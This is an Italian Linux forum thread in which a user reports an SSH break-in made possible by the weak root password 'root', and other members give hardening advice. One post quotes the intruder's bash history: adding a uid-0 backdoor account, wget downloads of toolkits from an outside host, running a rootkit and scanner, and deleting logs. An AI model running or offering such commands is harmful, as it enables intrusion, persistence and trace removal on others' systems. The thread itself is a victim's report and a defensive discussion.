Attacchi Lamer

Postate qui per tutte le discussioni legate alla sicurezza di Linux/Slackware

Moderatore: Staff

Regole del forum
1) Citare sempre la versione di Slackware usata, la versione del Kernel e magari anche la versione della libreria coinvolta. Questi dati aiutano le persone che possono rispondere.
2) Specificare se discussione/suggerimento o richiesta d'aiuto.
3) Leggere attentamente le risposte ricevute.
4) Scrivere i messaggi con il colore di default, evitare altri colori.
5) Scrivere in Italiano o in Inglese, se possibile grammaticalmente corretto, evitate stili di scrittura poco chiari, quindi nessuna abbreviazione tipo telegramma o scrittura stile SMS o CHAT.
6) Appena registrati è consigliato presentarsi nel forum dedicato.

La non osservanza delle regole porta a provvedimenti di vari tipo da parte dello staff, in particolare la non osservanza della regola 5 porta alla cancellazione del post e alla segnalazione dell'utente. In caso di recidività l'utente rischia il ban temporaneo.
Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

Salve a tutti e´ la prima volta che posto in questo Forum e lo faccio per necessita visto che appena mi muniro´ di un router passero´ a Linux Slackware.
<BR>Metto su questo forum la discussione per un semplice motivo :
<BR>Ieri alle 21:25 sono stato vittima di un attacco Lamer in piena regola, dai log risulta qualche frangente di questo attacco, non so pero´ per cosa abbiano usato il mio computer e la mia connessione :(, fortunatamente non avevo dati importanti che potessero essere trafugati.
<BR>Sono stato attaccato mentre sul mio sistema era in funzione una distro Mandrake, la mandrake 10.1, e per questo motivo la abbandono e passo a slackware consigliata vivamente da un amico.
<BR>D´ora in poi della sicurezza faro´ il mio punto forte.
<BR>Spero in questo forum di trovare aiuto visto che so della maggiore difficolta´ di utilizzo di slackware, ma cio´ non mi spaventa, l´amico google e forum come questi credo siano sufficenti per avere l´aiuto di cui ho bisogno.
<BR>Sto gia leggendo con gusto l´utile slackware for dummies e sto trovando molte risposte, spero tutte quelle di cui ho bisogno.
<BR>Ho gia trovato la risposta al problema ATI :)
<BR>Con questo mio primo post colgo l´occasione per salutare tutti e per dire w Slackware e dio me la mandi buona :) (che gia ho usato per un piccolo serverino a casa di un amico).
<BR>
<BR>P.S.: aspettatevi entro qualche giorno domande a raffica ( non preoccupatevi prima faro´ di tutto per risolvere da me almeno imparo poi passero´ di qui :) ).

Avatar utente
Loris
Admin
Admin
Messaggi: 7730
Iscritto il: lun 31 mar 2003, 0:00
Nome Cognome: Loris Vincenzi
Località: Gradisca D'Isonzo
Contatta:

Attacchi Lamer

Messaggio da Loris »

Sari benvenuto nel mondo Slackware :)
<BR>
<BR>p.s.
<BR>Sarebbe bello capire come hanno fatto questi Lamer a entrare nel tuo sistema, i log che dicono ?
"Ho una testa piuttosto balzana e comunque non sono quello che credete" - Roger Keith Barrett

Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

posto di seguito alcuni logggoni :) non so se sono utili a sapere qualcosa ma sono gli unici rimasti ...
<BR>
<BR>primo rimasto e´ il log della bash di Root
<BR>
<BR>w
<BR>dir -a
<BR>rm -rf .bash_history .bash_logout .fullcircle .ICEauthority .rfbdrake .vimrc
<BR>ls
<BR>dir -a
<BR>rm -rf .bash_profile .bashrc
<BR>/usr/sbin/adduser admin -g0 -o -u0
<BR>passwd admin
<BR>cat /etc/issue
<BR>/sbin/ifconfig
<BR>cd /var/tmp
<BR>wget bone.go.ro/mirkforce.tgz
<BR>tar -xzvf mirkforce.tgz
<BR>rm -rf mirkforce.tgz
<BR>cd ./ecmf/
<BR>./mirkforce
<BR>cd ..
<BR>ls
<BR>rm -rf ./ecmf/
<BR>cd /var/spool/samba/
<BR>ls
<BR>wget bone.go.ro/hait.tgz
<BR>tar -xzvf hait.tgz
<BR>rm -rf hait.tgz
<BR>cd ssh/
<BR>./go.sh 210.21
<BR>cd ..
<BR>ls
<BR>rm -rf ssh/
<BR>wget bone.go.ro/bone.tgz
<BR>tar -xzvf bone.tgz
<BR>rm -rf bone.tgz
<BR>cd " "
<BR>ls
<BR>mv lroot init
<BR>export PATH=.:$PATH
<BR>init
<BR>cd " "
<BR>ls
<BR>wget bone.go.ro/treeball.tgz
<BR>tar -xzvf treeball.tgz
<BR>dir -a
<BR>rm -rf treeball.tgz
<BR>ls
<BR>
<BR>Come si note han creato l´utente Admin, quello che mi insospettito all´avvio di mandrakkia, e poi il resto e´ storia :(.
<BR>
<BR>e questo i log Auth in var/log
<BR>
<BR>Feb 15 21:20:00 francesco sshd[21706]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 217.29.80.92
<BR>Feb 15 21:21:18 francesco sshd[21763]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 217.29.80.92 port 13155 ssh2
<BR>Feb 15 21:21:20 francesco sshd[21765]: Invalid user guest from 217.29.80.92
<BR>Feb 15 21:21:20 francesco sshd[21765]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 217.29.80.92 port 13239 ssh2
<BR>Feb 15 21:21:22 francesco sshd[21770]: Invalid user admin from 217.29.80.92
<BR>Feb 15 21:21:22 francesco sshd[21770]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 217.29.80.92 port 13315 ssh2
<BR>Feb 15 21:21:25 francesco sshd[21772]: Invalid user admin from 217.29.80.92
<BR>Feb 15 21:21:25 francesco sshd[21772]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:25 francesco sshd[21772]: Failed password for invalid user admin from 217.29.80.92 port 13439 ssh2
<BR>Feb 15 21:21:27 francesco sshd[21777]: Invalid user user from 217.29.80.92
<BR>Feb 15 21:21:27 francesco sshd[21777]: error: Could not get shadow information for NOUSER
<BR>Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 217.29.80.92 port 13538 ssh2
<BR>Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 217.29.80.92 port 13627 ssh2
<BR>Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 217.29.80.92 port 13700 ssh2
<BR>Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 81.181.153.217 port 1251 ssh2
<BR>Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash
<BR>Feb 15 21:23:04 francesco passwd(pam_unix)[21929]: password changed for admin
<BR>Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:30:00 francesco sshd[22316]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:33:53 francesco xinetd[5064]: START: sgi_fam pid=22502 from=<no address>
<BR>Feb 15 21:35:01 francesco sshd[22580]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:40:00 francesco sshd[22840]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:45:01 francesco sshd[23085]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:50:00 francesco sshd[23313]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 21:55:00 francesco sshd[23526]: Did not receive identification string from 127.0.0.1
<BR>Feb 15 22:00:00 francesco sshd[23740]: Did not receive identification string from 127.0.0.1
<BR>
<BR>si nota solo l´ora di inizio e poco altro apparte il loro ip :) ma ovviamente saran passati da proxy o avran cmqe usato qualcosa per renderlo inutile ...
<BR>Ovviamente prima dei suddetti log avran fatto qualcosa per avere i privilegi di root o roba simile, non sono un esperto pultroppo.
<BR>
<BR>

Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

A gia mi son dimenticato di dire anche che il computer era inagibile questa mattina quando sono andato a vedere come stava (e´ accesso molte ore al giorno anche di notte), errori sopra errori (oserei dire orrori), e ovvio ora lo raso a zero per cancellare ogni possibile problema.

Michele84
Linux 2.x
Linux 2.x
Messaggi: 267
Iscritto il: mer 17 dic 2003, 0:00
Contatta:

Attacchi Lamer

Messaggio da Michele84 »

Gia gia... ti hanno proprio "bucato" !!!
<BR>Dovresti capire però come sono riusciti ad entrare e ad avere accesso a previlegi di root.
<BR>Pure il mio pc è sempre acceso e quasi sempre trovo log di ip che provano ad entrare.
<BR>In ogni caso riesco a vedere quello che fanno grazie al log di syslog e message.
<BR>Molte delle volte questi cracker riescono ad entrare tramite una falla del sito web o qualcosa di simile.
<BR>Ciauz!
<BR>

Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

I log di Syslog sono andati a farsi benedire ghgh, hanno bruciato praticamente tutto, mi sono trovato il pc che non si avviava se non in modalita´ testuale (e per mandrake e´ moolto strano), con la maggior parte dei comandi stile cp che davano segmentation fault. Per fortuna le partizioni non sono state corrotte o rovinate cosi´ son riuscito a montarle.
<BR>Sicuramente han fatto casini grossi per togliere ogni traccia importante.
<BR>Sono felice di aver avuto windows (per la prima volta :) ) in una parte dell´hard-disk cosi´ ho potuto con qualche peripezia scartabellare le ext3 e salvare i dati importanti sulla partizione ntfs.
<BR>E per fortuna che tengo i backup dei dati su NTFS cosi´ son sicuro che non hanno scritto o fatto nulla almeno li dentro (almeno cosi´ credo).
<BR>Anzi domandona (se sparo una cavolata non uccidetemi ghgh): Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare?
<BR>
<BR>P.S.: Oggi pomeriggio assieme ad un amico compro il router ed installo slackware se tutto va bene stasera dovrei scrivere il mio primo messaggio con slacky :)

Avatar utente
useless
Staff
Staff
Messaggi: 3896
Iscritto il: dom 12 ott 2003, 0:00
Località: A place where the streets have no name
Contatta:

Attacchi Lamer

Messaggio da useless »

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-1>Quote:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><BLOCKQUOTE>
<BR> 18-02-2005 alle ore 09:59, Sari :
<BR>Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare?
<BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End -->
<BR>
<BR>se diventano root possono tranquillamente usare dd o qualsiasi tool che accede al disco come dispositivo a blocchi.

Avatar utente
People
Linux 2.x
Linux 2.x
Messaggi: 216
Iscritto il: mar 22 giu 2004, 0:00
Slackware: 12.1
Kernel: 2.6.
Desktop: KDE

Attacchi Lamer

Messaggio da People »

Si... sono d´accordo con lorys... sarebbe interessante capire....
<BR>
<BR>Ma il pc era su internet... come server web? Avevi altri servizi attivi? Possono aver avuto accesso alla macchina... fisicamente?
<BR>
<BR>Non per farmi gli affari tuoi.... ;-) ma perchè, secondo me, la tua esperienza può essere utile anche ad altri!
<BR>Ciao
<BR>P.

Avatar utente
manny
Linux 2.x
Linux 2.x
Messaggi: 278
Iscritto il: mer 29 ott 2003, 0:00
Slackware: 13.1 (fisso)
Kernel: 2.6.33.4
Desktop: kde
Distribuzione: Debian 5 (notebook)

Attacchi Lamer

Messaggio da manny »

Bella storia,
<BR>la tua password doveva essere veramente semplice se hanno impiegato così poco tempo per farti fuori; non credo che abbiano fatto saltare ssh, l´ultima versione è al sicuro da exploit...il tutto per dirti che anche montando una slackware NON sei al sicuro se non disabiliti servizi che non ti servono (vedi telnet, finger, ssh) e se non crei qualche restrizione di accesso, e utilizzando password - non solo lunghe - ma complicate. Per ssh per esempio puoi impostare nel sshd_config un solo utente che puo collegarsi e INIBIRE l´accesso come root: diventerai successivamente root col comando su. In questo modo crei una doppia complicazione per l´attaccante: non conosce già un utente (cioè root) dovendo poi solo indovinare la passwd ma dovrà conoscere l´utente abilitato a collegarsi via ssh + la sua passwd.
<BR>Dai un´occhiata veloce a <a href="http://www.valtellinux.it/blindolinux/blindolinux.htm" target="_blank" target="_new">http://www.valtellinux.it/blindolinux/b ... nux.htm</a>
<BR>Ciao!
<BR>Manny

Avatar utente
People
Linux 2.x
Linux 2.x
Messaggi: 216
Iscritto il: mar 22 giu 2004, 0:00
Slackware: 12.1
Kernel: 2.6.
Desktop: KDE

Attacchi Lamer

Messaggio da People »

Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root??
<BR>
<BR>P.
<BR>

Avatar utente
manny
Linux 2.x
Linux 2.x
Messaggi: 278
Iscritto il: mer 29 ott 2003, 0:00
Slackware: 13.1 (fisso)
Kernel: 2.6.33.4
Desktop: kde
Distribuzione: Debian 5 (notebook)

Attacchi Lamer

Messaggio da manny »

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-1>Quote:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><BLOCKQUOTE>
<BR> 18-02-2005 alle ore 12:33, People :
<BR>Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root??
<BR>
<BR>P.
<BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End -->
<BR>
<BR>Anch´io non ne so molto, ma da quello che vedo la macchina si chiamava francesco e l´attaccante stava provando diversi utenti e password per loggarsi. Ad un certo punto ha centrato quella di root, probabilmente perchè root oltretutto non era inibito all´accesso dal config di ssh...come l´abbia trovata non lo so, per fortuna o da qualche altra parte, ma da quello che vedo dai log così mi sembra.
<BR>Ciao,
<BR>Manny

Avatar utente
useless
Staff
Staff
Messaggi: 3896
Iscritto il: dom 12 ott 2003, 0:00
Località: A place where the streets have no name
Contatta:

Attacchi Lamer

Messaggio da useless »

ti va di dirci qual era la tua password di root? così, per curiosità!

Avatar utente
touchstyle
Linux 4.x
Linux 4.x
Messaggi: 1085
Iscritto il: gio 13 mag 2004, 0:00
Slackware: 12.1
Kernel: 2.6.27
Desktop: KDE
Località: Portogruaro [VE]
Contatta:

Attacchi Lamer

Messaggio da touchstyle »

Questa sporca faccenda mi ha fatto riflettere...
<BR>Gli utenti che utilizzano Linux secondo me si dividono in 3:
<BR>- quelli che non sanno niente ---> Mandrake
<BR>- quelli che vogliono imparare ---> Slack
<BR>- quelli che gia sanno ---> Slack ricompilata ad hoc.
<BR>Con questo voglio dire che l´utente che si avvicina al pinguino con le ultime distro (Mandrake dalla 9 in poi, Suse >8.2, Fedora ecc...) pensano di trovarsi su un sistema sicuro e al riparo da intrusioni.
<BR>Questo purtroppo non è vero.
<BR>Linux, se non configurato a dovere (lo so, ci vuole poco), avvia servizi che qualcuno può sfruttare volontariamente in maniera non legittima.
<BR>La fortuna é che per poter accedere ad un sistema basato su linux serve SAPERE, e chi è in possesso di queste informazioni normalmente NON le usa per scopi lamerosi o crakkosi, in quanto la nobiltà d´animo è proporzionale alla conoscienza, a mio avviso.
<BR>Naturalmente le mele marce esistono, e si sa che il "male" fa rumore, mentre il "bene" è un vento silenzioso.
<BR>
<BR>Tutta ´sta menata per dire cosa?
<BR>Beh, per proporre che nel nuovo Slack4Dumm, ci sia una sezione dedicata alla sicurezza "domestica" con:
<BR>- come proteggere la macchina che si usa per navigare/posta/lopster;
<BR>- come controllare i files di log (argomento VIP!);
<BR>- come testare se la macchina è sicura e da cosa.
<BR>
<BR>Bon, basta. Son stuf,go scrito massa! :-o
<BR>Ou fioi, forse cambio piccì! :-] Togo un P3-700 da Simpaticotech, a 190 euri? Fasso ben?
<BR>
<BR>Se fossi gatto, miao.
<BR>Se fossi cane, bao.
<BR>Se fosse tardi... ciao.
<BR>
<BR>Touch
<BR>

Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

Ok so che mi prendero´ del deficente ghgh.
<BR>Ora vi svelero´ la mia password di root, quella vecchia ovviamente ora l´ho cambiata, dagli errori si impara ...
<BR>
<BR>Pronti? Vi siete seduti comodamente con i popcorn e una birra fresca? Pronti a sentire la frase che vi fara´ ridere per mille anni dell´idiozia di un uomo? ....
<BR>
<BR>La mia password di root era ... ROOT .........
<BR>
<BR>
<BR>
<BR>
<BR>Ok ora potete uccidermi .......

Avatar utente
Sari
Linux 3.x
Linux 3.x
Messaggi: 584
Iscritto il: mer 16 feb 2005, 0:00
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome
Località: Verona

Attacchi Lamer

Messaggio da Sari »

a gia dimenticavo ... Ho vinto qualche cossa?!?!? ... dai perlomeno sono entrato nell´albo d´oro delle cavolate o no?

Rispondi